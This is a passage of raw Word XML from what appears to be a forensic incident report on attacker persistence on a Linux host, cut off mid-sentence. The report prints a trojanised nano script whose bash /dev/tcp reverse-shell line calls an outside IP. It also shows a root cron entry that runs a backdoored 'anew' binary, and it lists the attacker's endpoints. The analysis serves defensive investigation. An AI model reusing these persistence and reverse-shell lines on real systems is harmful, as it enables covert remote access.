          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After that full root access to the attacker is a matter of a few commands. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198D8AF3" w14:textId="77777777" w:rsidR="000F6F1C" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc119794116"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Persistance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Methods</w:t>
      </w:r>
      <w:r w:rsidR="000F6F1C" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> used by the attacker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidR="000F6F1C" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01608115" w14:textId="77777777" w:rsidR="0035074C" w:rsidRPr="002355AE" w:rsidRDefault="000F6F1C" w:rsidP="00D50403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker is using a few methods for a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>persistant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> access to the system. In addition to that</w:t>
      </w:r>
      <w:r w:rsidR="0035074C" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> some modified binaries were identified during the investigation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C6959B" w14:textId="70957370" w:rsidR="0035074C" w:rsidRPr="002355AE" w:rsidRDefault="0035074C" w:rsidP="0035074C">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Ref119788350"/>
      <w:bookmarkStart w:id="23" w:name="_Toc119794117"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Modified nano binary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307A8028" w14:textId="26DD05FF" w:rsidR="00746901" w:rsidRPr="002355AE" w:rsidRDefault="00746901" w:rsidP="00D50403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A modified nano binary was found in the following directory </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/local/bin/nano</w:t>
      </w:r>
      <w:r w:rsidR="006051D5" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B12F026" w14:textId="3982A0D3" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ which nano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63607F63" w14:textId="18E18E31" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/local/bin/nano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1EBC6F" w14:textId="77777777" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="227CE894" w14:textId="15C36D69" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/local/bin/nano </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF32C51" w14:textId="77777777" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F7DBE6" w14:textId="77777777" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/54.121.44.208/13337 0&gt;&amp;1 &amp; 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABBAA12" w14:textId="77777777" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/date </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD8A2E" w14:textId="2167A5A9" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="00746901">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204B079C" w14:textId="5355B742" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As can be seen from this output, the currently used nano file tries to connect to the following endpoint </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>54.121.44.208</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>13337</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> via a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so called</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell. This would mean that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>everytime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the user tried to access the nano command, the attacker gets a shell with the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> permissions instead. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A644E66" w14:textId="157D728F" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This file should be removed from the system immediately. </w:t>
      </w:r>
      <w:r w:rsidR="004375EB" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As nano is a commonly used tool to edit text files on the CLI of a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004375EB" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004375EB" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> based system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739AFBF1" w14:textId="6E3C5B11" w:rsidR="0035074C" w:rsidRPr="002355AE" w:rsidRDefault="0035074C" w:rsidP="0035074C">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc119794118"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Modified anew binary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="1C7E922A" w14:textId="66702F84" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When looking at existing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobs for the root user, an entry can be determined. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FFBA5D" w14:textId="116B9B04" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:pStyle w:val="HTMLVorformatiert"/>
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">59 23 * * * </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rStyle w:val="c01"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/anew</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30148D" w14:textId="77777777" w:rsidR="00723340" w:rsidRPr="002355AE" w:rsidRDefault="006051D5" w:rsidP="006051D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This runs the binary </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/anew</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00723340" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">every day at 23:59. After a short </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00723340" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disassemliing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00723340" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the binary the following pseudo code can be obtained: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC4CA4" w14:textId="61A8ABCE" w:rsidR="006051D5" w:rsidRPr="002355AE" w:rsidRDefault="00723340" w:rsidP="00723340">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42EFA45F" wp14:editId="0F774937">
            <wp:extent cx="4062375" cy="2357252"/>
            <wp:effectExtent l="19050" t="19050" r="14605" b="2413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288" t="31510" r="2754" b="13280"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4085636" cy="2370749"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C619D6" w14:textId="431A6C1B" w:rsidR="00723340" w:rsidRPr="002355AE" w:rsidRDefault="00723340" w:rsidP="00723340">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F724D7">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Decompiled view of the main function of </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anew</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3EA09" w14:textId="793591E0" w:rsidR="00723340" w:rsidRPr="002355AE" w:rsidRDefault="00723340" w:rsidP="00723340">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As can be seen from the </w:t>
      </w:r>
      <w:r w:rsidR="00103A9F" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">decompiled view a connection to the host 10.10.10.10:13373 is made. This way the attacker gets a reliable way to get a reverse shell that will restart every day. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F0B5C0" w14:textId="172A45FF" w:rsidR="00B43491" w:rsidRPr="002355AE" w:rsidRDefault="00B43491" w:rsidP="00B43491">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Ref119788338"/>
      <w:bookmarkStart w:id="26" w:name="_Toc119794119"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Modified </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fsudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="4BCC18C9" w14:textId="598FC03E" w:rsidR="00103A9F" w:rsidRPr="002355AE" w:rsidRDefault="00D50403" w:rsidP="00D50403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When executing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> command when logged in as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
